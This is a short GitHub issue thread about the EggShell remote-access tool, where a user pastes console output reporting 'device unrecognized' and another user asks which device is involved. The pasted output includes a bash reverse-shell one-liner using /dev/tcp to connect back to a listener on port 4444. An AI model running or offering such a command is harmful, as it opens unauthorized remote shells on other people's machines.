### ISSUE TITLE
device unrecognized

### ISSUE THREAD

**Issue by alvaroillanes** [neoneggplant/EggShell#67]
follow all the steps and the cell phone does not recognize me ...

EggShell> 3
SET LHOST (Leave blank for 192.168.0....)>
[] LHOST = 192.168.0....
SET LPORT (Leave blank for 4444)>
[] LPORT = 4444
bash &> /dev/tcp/192.168..../4444 0>&1
EggShell> Start Server? (Y/n):
EggShell> Multi Server? (y/N):
[] Listening on port 4444...
[] Connecting to 192.168.0....
[*] device unrecognized
x86_64

[*] Press Enter To Continue`

**Comment by paskal06** [comment]
What device are you trying to connect?
